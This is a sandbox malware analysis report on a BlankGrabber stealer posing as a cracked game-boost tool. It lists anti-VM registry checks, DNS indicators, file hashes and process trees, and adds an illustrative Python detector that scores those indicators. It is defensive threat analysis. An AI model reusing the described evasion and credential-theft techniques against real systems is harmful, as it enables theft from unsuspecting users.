Malware Analysis Report

2024-10-10 08:32

Sample ID 240620-j9tmmsxfqe
Target boostup_boost_tool_cracked.zip
SHA256 a87cd76b25f1927111bb0d8c81585861dc614dbb84612351b2d909aa5dd97f63
Tags
evasion trojan upx blankgrabber execution spyware stealer themida
score
10/10

Table of Contents

Analysis Overview; MITRE ATT&CK (Enterprise Matrix V15); Analysis: static1 (Detonation Overview, Signatures); Analysis: behavioral5, behavioral7, behavioral11, behavioral4, behavioral10, behavioral12, behavioral1, behavioral2, behavioral6, behavioral8, behavioral9, behavioral3 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files).

Analysis Overview

score
10/10

SHA256

a87cd76b25f1927111bb0d8c81585861dc614dbb84612351b2d909aa5dd97f63

Threat Level: Known bad

The file boostup_boost_tool_cracked.zip was found to be: Known bad.

Malicious Activity Summary

evasion trojan upx blankgrabber execution spyware stealer themida

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller (the sandbox's family description; note that in the behavioral runs below the payload unpacks into onefile_<PID>_<timestamp> directories, which is Nuitka's onefile convention, while behavioral7 shows a PyInstaller-style _MEI directory, so more than one Python packager is involved)

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks BIOS information in registry

UPX packed file

Loads dropped DLL

Themida packer

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Looks up external IP address via web service

Enumerates physical storage devices

Unsigned PE

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Gathers system information

Suspicious use of WriteProcessMemory

Enumerates processes with tasklist

Modifies registry class

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported

2024-06-20 08:22

Signatures

A stealer written in Python and packaged with Pyinstaller
1 match (static; no indicator, process or target recorded)

Blankgrabber family

blankgrabber

Unsigned PE
2 matches (no indicator, process or target recorded)

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win7-20240220-en

Max time kernel

140s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  (process: C:\Windows\system32\rundll32.exe)

Checks BIOS information in registry

Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  (process: C:\Windows\system32\rundll32.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  (process: C:\Windows\system32\rundll32.exe)

Checks whether UAC is enabled

evasion trojan
Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  (process: C:\Windows\system32\rundll32.exe)

Suspicious use of WriteProcessMemory

PID 2280 wrote to memory of PID 2956, 3 events  (source: C:\Windows\system32\rundll32.exe, target: C:\Windows\system32\WerFault.exe)

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2280 -s 116

WerFault.exe is Windows Error Reporting and -p 2280 names the faulting process: the rundll32.exe host of crack.dll (PID 2280) crashed. The WriteProcessMemory signature above is therefore the crash-reporting handshake with WerFault, not injection into a victim process, and this Windows 7 run should be read as ending at the crash, with only the VirtualBox/BIOS/UAC checks observed before it.

Network

N/A

Files

memory/2280-1-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-4-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-0-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-2-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-3-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-5-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-6-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-7-0x0000000072E40000-0x000000007381F000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win7-20240221-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

The second loader.exe is a child copy of the first, the usual onefile bootstrap-then-child pattern, and the only artifact it left is python311.dll under _MEI29522 (PyInstaller's extraction-directory naming). Nothing else ran: CPython 3.11 does not support Windows 7, so the win7 runs of loader.exe here and of main.exe in behavioral11 show only the unpacking step and say nothing about the payload. The Windows 10 runs (behavioral8, behavioral12) are the ones to read for behaviour.

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI29522\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

memory/2124-24-0x000007FEF60D0000-0x000007FEF66B9000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win7-20240508-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1700_133633453796928000\main.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

PID 1700 is the onefile bootstrap (its PID is embedded in the onefile_1700_... directory name) and PID 2772 is consistent with the extracted main.exe it launched. As with loader.exe in behavioral7, Python 3.11 does not run on Windows 7, so the absence of signatures here is an environment limitation, not evidence that main.exe is benign.

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\onefile_1700_133633453796928000\main.exe

MD5 49d08125658272ff5c325f8789b6e6ee
SHA1 33629d347573c8ae2c7f34fadf70cd91fdb4dcb2
SHA256 fce000dc1908a48dec2c9b16d4ab4aca97bbefc0118a41fcd36a03228acaa40c
SHA512 68ba097ccc0d324ac9ec43f9ab3056e4c7d05519a69353994062b60ad44a0d31955a8845b5e4d2fdfa90b7646d552a30e56ec4746dae521fe05b74f248ce43f0

C:\Users\Admin\AppData\Local\Temp\onefile_1700_133633453796928000\python311.dll

MD5 65e381a0b1bc05f71c139b0c7a5b8eb2
SHA1 7c4a3adf21ebcee5405288fc81fc4be75019d472
SHA256 53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA512 4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

memory/2772-42-0x000000013F1C0000-0x0000000141C86000-memory.dmp

memory/1700-46-0x000000013FCB0000-0x0000000141470000-memory.dmp

memory/1700-80-0x000000013FCB0000-0x0000000141470000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

52s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml

Signatures

The sandbox ran the YAML configuration file through cmd.exe; the image has no registered handler for .yml, so the "Open with" dialog (OpenWith.exe) appeared. All three signatures below come from cmd.exe and OpenWith.exe, not from the sample.

Enumerates physical storage devices

Modifies registry class

Key created: \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings  (process: C:\Windows\system32\cmd.exe)
Key created: \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings  (process: C:\Windows\system32\OpenWith.exe)

Suspicious use of SetWindowsHookEx

1 call, process: C:\Windows\system32\OpenWith.exe (no indicator recorded)

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:22

Platform

win10v2004-20240508-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

This run recorded nothing: it was reported in the same minute it was submitted and has no kernel or network time. It carries no information about the sample either way.

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

54s

Command Line

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

Signatures

Executes dropped EXE

1 execution, process: C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe (no indicator recorded)

Loads dropped DLL

27 loads, process: C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe (no per-DLL indicator recorded; the DLLs and .pyd modules are listed under Files)

Legitimate hosting services abused for malware hosting/C2

Indicator: raw.githubusercontent.com (process and target not recorded)

Looks up external IP address via web service

Indicator: api64.ipify.org (process and target not recorded)

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 api64.ipify.org udp
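The registry checks reported for rundll32.exe and bound.exe (behavioral5, behavioral6, behavioral8) and the DNS indicators above (api64.ipify.org and raw.githubusercontent.com here, ip-api.com in behavioral8) are a small enough rule set to reproduce outside the sandbox. The Python below is an added example, not code from the report, the sandbox or BlankGrabber: it correlates constructed sandbox-style event lines per process using the exact registry paths and domains this report lists, weights them so that a lone BIOS-version read (common in legitimate software) does not score like opening the VirtualBox ACPI key, and discards in-addr.arpa reverse lookups such as the 8.8.8.8.in-addr.arpa entry above as resolver noise. The event line format, the tag weights, the PIDs other than 2280 and the attribution of the DNS queries to the extracted main.exe (which the report records as N/A) are assumptions.

```python
"""Per-process correlator for the evasion and network indicators in this report.

Added example, not part of the sandbox report or of BlankGrabber. The event line
format and the DNS process attribution are constructed; the registry paths and
domains are the ones the report lists.
"""
from __future__ import annotations

import re
from collections import defaultdict

# Registry indicators, verbatim from the report's signature tables
VBOX_ACPI_KEY = r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__"
BIOS_VALUES = {
    r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion",
    r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion",
}
UAC_VALUE = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"
# Network indicators from behavioral12 (api64.ipify.org, raw.githubusercontent.com)
# and behavioral8 (ip-api.com)
IP_LOOKUP_SERVICES = {"api64.ipify.org", "ip-api.com"}
ABUSED_HOSTING = {"raw.githubusercontent.com"}

# Assumed weights: a BIOS version read on its own is common in legitimate
# software; opening the VirtualBox ACPI table key is not.
TAG_WEIGHTS = {
    "vbox_acpi_check": 3,
    "bios_check": 1,
    "uac_check": 1,
    "external_ip_lookup": 2,
    "legit_hosting_c2": 1,
}

# Constructed event format: "<pid> <image> <kind> <argument>" (no spaces in paths)
EVENT_RE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<image>\S+)\s+(?P<kind>RegOpenKey|RegQueryValue|DnsQuery)\s+(?P<arg>\S+)$"
)
_BIOS_LOWER = {v.lower() for v in BIOS_VALUES}


def is_reverse_lookup(domain: str) -> bool:
    """PTR lookups such as 8.8.8.8.in-addr.arpa are resolver noise, not C2."""
    return domain.lower().endswith(".in-addr.arpa")


def tag_for(kind: str, arg: str) -> str | None:
    """Map one event to a signature tag, or None when it matches nothing."""
    if kind in ("RegOpenKey", "RegQueryValue"):
        key = arg.lower()
        if key == VBOX_ACPI_KEY.lower():
            return "vbox_acpi_check"
        if key in _BIOS_LOWER:
            return "bios_check"
        if key == UAC_VALUE.lower():
            return "uac_check"
    elif kind == "DnsQuery" and not is_reverse_lookup(arg):
        host = arg.lower()
        if host in IP_LOOKUP_SERVICES:
            return "external_ip_lookup"
        if host in ABUSED_HOSTING:
            return "legit_hosting_c2"
    return None


def correlate(event_text: str) -> dict[int, dict]:
    """Collect the distinct tags per PID and score them; unparsable lines are skipped."""
    per_pid: dict[int, dict] = defaultdict(lambda: {"image": None, "tags": set(), "score": 0})
    for line in event_text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        tag = tag_for(m["kind"], m["arg"])
        if tag is None:
            continue
        entry = per_pid[int(m["pid"])]
        entry["image"] = m["image"]
        entry["tags"].add(tag)
    for entry in per_pid.values():
        entry["score"] = sum(TAG_WEIGHTS[t] for t in entry["tags"])
    return dict(per_pid)


def verdict(score: int) -> str:
    """Three-way split for a triage queue (thresholds are this example's choice)."""
    if score >= 4:
        return "high"
    if score >= 2:
        return "medium"
    return "low"


# Constructed events. PID 2280 / rundll32.exe and its registry paths mirror
# behavioral5; attributing the DNS queries to the extracted main.exe (PID 3372)
# is an assumption, the report records no process for them; PID 4100 is a
# benign-looking control case.
SAMPLE_EVENTS = r"""
2280 C:\Windows\system32\rundll32.exe RegOpenKey \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
2280 C:\Windows\system32\rundll32.exe RegQueryValue \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
2280 C:\Windows\system32\rundll32.exe RegQueryValue \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
2280 C:\Windows\system32\rundll32.exe RegQueryValue \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
3372 C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe DnsQuery 8.8.8.8.in-addr.arpa
3372 C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe DnsQuery raw.githubusercontent.com
3372 C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe DnsQuery api64.ipify.org
4100 C:\Windows\system32\svchost.exe RegQueryValue \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
"""

if __name__ == "__main__":
    for pid, entry in sorted(correlate(SAMPLE_EVENTS).items()):
        print(pid, entry["image"], sorted(entry["tags"]), entry["score"], verdict(entry["score"]))
```

Scoring distinct tags rather than raw event counts matters: the sandbox logged the BIOS query twice for PID 2280, and a count-based rule would let any chatty but harmless process outscore a single decisive VBOX__ probe.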

Files

Most of what follows is the bundled interpreter, not the malware: python311.dll, VCRUNTIME140.dll, vcruntime140_1.dll, libcrypto-3.dll, libssl-3.dll and libffi-8.dll are the CPython 3.11 and MSVC runtime, the top-level .pyd files are standard-library extension modules, and the yaml, tls_client, websockets, zstandard, charset_normalizer, certifi and pywin32 files are third-party packages the payload imports. Their hashes identify a Python build and make poor blocking indicators. The sample-specific artifact is the extracted main.exe (SHA256 fce000dc1908a48dec2c9b16d4ab4aca97bbefc0118a41fcd36a03228acaa40c, the same file seen in behavioral11). ONEFIL~1 is the 8.3 short name of the same onefile_3664_133633453807017013 directory. The memory dumps come from PID 3664, the onefile bootstrap whose PID is in that directory name, and PID 3372, consistent with the extracted main.exe (the two image sizes match the 1700/2772 pair in behavioral11).

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\python311.dll

MD5 65e381a0b1bc05f71c139b0c7a5b8eb2
SHA1 7c4a3adf21ebcee5405288fc81fc4be75019d472
SHA256 53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA512 4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe

MD5 49d08125658272ff5c325f8789b6e6ee
SHA1 33629d347573c8ae2c7f34fadf70cd91fdb4dcb2
SHA256 fce000dc1908a48dec2c9b16d4ab4aca97bbefc0118a41fcd36a03228acaa40c
SHA512 68ba097ccc0d324ac9ec43f9ab3056e4c7d05519a69353994062b60ad44a0d31955a8845b5e4d2fdfa90b7646d552a30e56ec4746dae521fe05b74f248ce43f0

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\VCRUNTIME140.dll

MD5 4585a96cc4eef6aafd5e27ea09147dc6
SHA1 489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256 a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512 d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\yaml\_yaml.pyd

MD5 e383f5064e9afe76cd25b49d00ffa275
SHA1 5073f97495ae0694bf79865852eda271a309f50f
SHA256 a0c62c035cd131ce1e574742d91d415de761a5c5d5c35a4f36a41b8e0b0ab195
SHA512 34c4b567c628d0c14f330dae8dd069b08940e087666666db9aa4497680f3111ab580f4ac702d726a7d6ab85fd4e9b27a952800a2b5271edb50374a30f15bc5b5

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

MD5 22c4892caf560a3ee28cf7f210711f9e
SHA1 b30520fadd882b667ecef3b4e5c05dc92e08b95a
SHA256 e28d4e46e5d10b5fdcf0292f91e8fd767e33473116247cd5d577e4554d7a4c0c
SHA512 edb86b3694fff0b05318decf7fc42c20c348c1523892cce7b89cc9c5ab62925261d4dd72d9f46c9b2bda5ac1e6b53060b8701318b064a286e84f817813960b19

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\tls_client\dependencies\tls-client-64.dll

MD5 6b0b5bb89d4fab802687372d828321b4
SHA1 a6681bee8702f7abbca891ac64f8c4fb7b35fbb5
SHA256 ec4f40c5f1ac709313b027c16face4d83e0dafdbc466cff2ff5d029d00600a20
SHA512 50c857f4a141ad7db8b6d519277033976bf97c9a7b490186a283403c05cb83b559a596efaf87ca46bc66bdf6b80636f4622324551c9de2c26bebfdbb02209d34

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

MD5 c888ecc8298c36d498ff8919cebdb4e6
SHA1 f904e1832b9d9614fa1b8f23853b3e8c878d649d
SHA256 21d59958e2ad1b944c4811a71e88de08c05c5ca07945192ab93da5065fac8926
SHA512 7161065608f34d6de32f2c70b7485c4ee38cd3a41ef68a1beacee78e4c5b525d0c1347f148862cf59abd9a4ad0026c2c2939736f4fc4c93e6393b3b53aa7c377

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-3.dll

MD5 51e8a5281c2092e45d8c97fbdbf39560
SHA1 c499c810ed83aaadce3b267807e593ec6b121211
SHA256 2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
SHA512 98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

MD5 2c0ec225e35a0377ac1d0777631bffe4
SHA1 7e5d81a06ff8317af52284aedccac6ebace5c390
SHA256 301c47c4016dac27811f04f4d7232f24852ef7675e9a4500f0601703ed8f06af
SHA512 aea9d34d9e93622b01e702defd437d397f0e7642bc5f9829754d59860b345bbde2dd6d7fe21cc1d0397ff0a9db4ecfe7c38b649d33c5c6f0ead233cb201a73e0

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

MD5 8472d39b9ee6051c961021d664c7447e
SHA1 b284e3566889359576d43e2e0e99d4acf068e4fb
SHA256 8a9a103bc417dede9f6946d9033487c410937e1761d93c358c1600b82f0a711f
SHA512 309f1ec491d9c39f4b319e7ce1abdedf11924301e4582d122e261e948705fb71a453fec34f63df9f9abe7f8cc2063a56cd2c2935418ab54be5596aadc2e90ad3

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd

MD5 66e78727c2da15fd2aac56571cd57147
SHA1 e93c9a5e61db000dee0d921f55f8507539d2df3d
SHA256 4727b60962efacfd742dca21341a884160cf9fcf499b9afa3d9fdbcc93fb75d0
SHA512 a6881f9f5827aceb51957aaed4c53b69fcf836f60b9fc66eeb2ed84aed08437a9f0b35ea038d4b1e3c539e350d9d343f8a6782b017b10a2a5157649abbca9f9a

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

MD5 28ede9ce9484f078ac4e52592a8704c7
SHA1 bcf8d6fe9f42a68563b6ce964bdc615c119992d0
SHA256 403e76fe18515a5ea3227cf5f919aa2f32ac3233853c9fb71627f2251c554d09
SHA512 8c372f9f6c4d27f7ca9028c6034c17deb6e98cfef690733465c1b44bd212f363625d9c768f8e0bd4c781ddde34ee4316256203ed18fa709d120f56df3cca108b

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd

MD5 d386b7c4dcf589e026abfc7196cf1c4c
SHA1 c07ce47ce0e69d233c5bdd0bcac507057d04b2d4
SHA256 ad0440ca6998e18f5cc917d088af3fea2c0ff0febce2b5e2b6c0f1370f6e87b1
SHA512 78d79e2379761b054df1f9fd8c5b7de5c16b99af2d2de16a3d0ac5cb3f0bd522257579a49e91218b972a273db4981f046609fdcf2f31cf074724d544dac7d6c8

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\_uuid.pyd

MD5 3a09b6db7e4d6ff0f74c292649e4ba96
SHA1 1a515f98946a4dccc50579cbcedf959017f3a23c
SHA256 fc09e40e569f472dd4ba2ea93da48220a6b0387ec62bb0f41f13ef8fab215413
SHA512 8d5ea9f7eee3d75f0673cc7821a94c50f753299128f3d623e7a9c262788c91c267827c859c5d46314a42310c27699af5cdfc6f7821dd38bf03c0b35873d9730f

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\unicodedata.pyd

MD5 57f8f40cf955561a5044ddffa4f2e144
SHA1 19218025bcae076529e49dde8c74f12e1b779279
SHA256 1a965c1904da88989468852fdc749b520cce46617b9190163c8df19345b59560
SHA512 db2a7a32e0b5bf0684a8c4d57a1d7df411d8eb1bc3828f44c95235dd3af40e50a198427350161dff2e79c07a82ef98e1536e0e013030a15bdf1116154f1d8338

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\_queue.pyd

MD5 50842ce7fcb1950b672d8a31c892a5d1
SHA1 d84c69fa2110b860da71785d1dbe868bd1a8320f
SHA256 06c36ec0749d041e6957c3cd7d2d510628b6abe28cee8c9728412d9ce196a8a2
SHA512 c1e686c112b55ab0a5e639399bd6c1d7adfe6aedc847f07c708bee9f6f2876a1d8f41ede9d5e5a88ac8a9fbb9f1029a93a83d1126619874e33d09c5a5e45a50d

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\_overlapped.pyd

MD5 d3be208dc5388225162b6f88ff1d4386
SHA1 8effdb606b6771d5fdf83145de0f289e8ad83b69
SHA256 ce48969ebebdc620f4313eba2a6b6cda568b663c09d5478fa93826d401abe674
SHA512 9e1c3b37e51616687eecf1f7b945003f6eb4291d8794fea5545b4a84c636007eb781c18f6436039df02a902223ac73efac9b2e44ddc8594db62feb9997475da3

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

MD5 78d9dd608305a97773574d1c0fb10b61
SHA1 9e177f31a3622ad71c3d403422c9a980e563fe32
SHA256 794d039ffdf277c047e26f2c7d58f81a5865d8a0eb7024a0fac1164fea4d27cf
SHA512 0c2d08747712ed227b4992f6f8f3cc21168627a79e81c6e860ee2b5f711af7f4387d3b71b390aa70a13661fc82806cc77af8ab1e8a8df82ad15e29e05fa911bf

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\_asyncio.pyd

MD5 cee78dc603d57cb2117e03b2c0813d84
SHA1 095c98ca409e364b8755dc9cfd12e6791bf6e2b8
SHA256 6306be660d87ffb2271dd5d783ee32e735a792556e0b5bd672dc0b1c206fdadc
SHA512 7258560aa557e3e211bb9580add604b5191c769594e17800b2793239df45225a82ce440a6b9dcf3f2228ed84712912affe9bf0b70b16498489832df2dee33e7e

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\websockets\speedups.pyd

MD5 99480b51453f6f78ee60954cac18454d
SHA1 4cb835152039ffcbd398f8b24fed39aae92566ed
SHA256 ebd0130532db4ea3ecb1d52a85d166714c0cd2817145e4d2616e780c6614bc43
SHA512 2b35860408dda6eb9e9ae6900e46bc2ea05e2338b62de2f484ee1b86135da4e0a849cba6bae28a52771692e54bd4779cbd69343edb13d70b387f44d7ed0aed73

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\_decimal.pyd

MD5 baaa9067639597e63b55794a757ddeff
SHA1 e8dd6b03ebef0b0a709e6cccff0e9f33c5142304
SHA256 6cd52b65e11839f417b212ba5a39f182b0151a711ebc7629dc260b532391db72
SHA512 7995c3b818764ad88db82148ea0ce560a0bbe9594ca333671b4c5e5c949f5932210edbd63d4a0e0dc2daf24737b99318e3d5daaee32a5478399a6aa1b9ee3719

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\libssl-3.dll

MD5 bfc834bb2310ddf01be9ad9cff7c2a41
SHA1 fb1d601b4fcb29ff1b13b0d2ed7119bd0472205c
SHA256 41ad1a04ca27a7959579e87fbbda87c93099616a64a0e66260c983381c5570d1
SHA512 6af473c7c0997f2847ebe7cee8ef67cd682dee41720d4f268964330b449ba71398fda8954524f9a97cc4cdf9893b8bdc7a1cf40e9e45a73f4f35a37f31c6a9c3

memory/3664-83-0x00007FF7903A0000-0x00007FF791B60000-memory.dmp

memory/3372-85-0x00007FFE88970000-0x00007FFE898FC000-memory.dmp

memory/3372-84-0x00007FF66C9B0000-0x00007FF66F476000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\zstandard\backend_c.pyd

MD5 baf4db7977e04eca7e4151da57dc35d6
SHA1 80c70496375037ca084365e392d903dea962566c
SHA256 1a2ec2389c1111d3992c788b58282aaf1fc877b665b195847faf58264bf9bc33
SHA512 9b04f24ee61efa685c3af3e05000206384ec531a120209288f8fdc4fb1ec186c946fd59e9eb7381e9077bfbcfc7168b86a71c12d06529e70a7f30e44658a4950

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\win32security.pyd

MD5 0007e4004ee357b3242e446aad090d27
SHA1 4a26e091ca095699e6d7ecc6a6bfbb52e8135059
SHA256 10882e7945becf3e8f574b61d0209dd7442efd18ab33e95dceececc34148ab32
SHA512 170fa5971f201a18183437fc9e97dcd5b11546909d2e47860a62c10bff513e2509cb4082b728e762f1357145df84dcee1797133225536bd15fc87b2345659858

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\charset_normalizer\md__mypyc.pyd

MD5 f4192b63f194d4b4e420e319f08fd398
SHA1 03e2f59492e05f899cb5399a4971b3ee700f00c1
SHA256 0be6ce456259ec228b1e42b8406d6eecf4c9fc4c96b9c3dc6255695f539bfdca
SHA512 447f4909a742e3f2abbe37c2f02d1e9106ded7be5c1d3c1bcbe3985d61791c2eac85bfc9870518fb6d99c7bd32a73c99e9961b797aeee95756f59bf0d2038009

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\charset_normalizer\md.pyd

MD5 25e5dd43a30808f30857c6e46e6bc8df
SHA1 679cb7169813a9a0224f03624984645ea18aabe6
SHA256 62639a735008dd068142c0efca7f3d0f96f4959a52278fcf70012946e8552974
SHA512 904855da98f610a6ebe18ba76f7130a7f9a0ba5da0364fbc9ce79127728597c473aa85f8c0ccaf9f0af81da8f4e6ad7b722890839ee03f381e50177301661cc3

